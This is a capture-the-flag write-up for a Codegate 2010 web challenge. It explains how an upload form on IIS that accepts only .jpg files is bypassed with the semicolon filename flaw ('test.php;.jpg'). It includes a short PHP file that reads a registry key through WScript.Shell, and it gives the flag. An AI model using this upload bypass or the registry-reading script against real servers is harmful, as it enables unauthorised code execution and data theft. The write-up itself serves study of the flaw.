Summary

http://ctf6.codegate.org/31337_/index.html

Get a value of HKLMSoftwarecodegate2010, it’s the flag.

Analysis

At first when accessing the url, it shows up a page allow you to upload a jpeg image and only .jpg files. As I noticed, it serves by IIS. Suddenly, I remember of the vulnerability of IIS in processing image files. A little bit google show me the result. Ah ha, let’s test it by uploading a php file likes “test.php;.jpg”. Incredible!

Now, the only thing we have to do is writing some lines of php to read the REG key.

regprint.php;.jpg
<?
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
$devenvpath=$shell->RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\codegate2010");
echo $devenvpath
?>

Then, execute it by  http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg

LollerSkaterz_From_RoflCopters_With_Guinness

Easy game with 1200 point.

Vulnerability

In facts, after the game thaidn said that it’s a fault of deploying the challenge, it’s designed to be passed by a 0-day of core php.

References

• http://soroush.secproject.com/blog/2009/12/microsoft-iis-semi-colon-vulnerability/
• Keywords: IIS, semi-colon vulnerability